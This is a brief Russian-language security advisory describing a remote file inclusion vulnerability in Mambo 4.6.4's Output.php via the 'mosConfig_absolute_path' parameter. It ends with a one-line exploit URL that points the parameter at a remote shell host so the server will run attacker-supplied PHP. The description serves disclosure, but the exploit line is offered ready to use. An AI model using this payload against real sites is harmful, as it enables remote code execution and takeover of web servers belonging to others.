Программа: Mambo 4.6.4

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «mosConfig_absolute_path» сценарием Output.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://[host]/[path]/includes/Cache/Lite/Output.php? mosConfig_absolute_path=http://shell?



Оставить мнение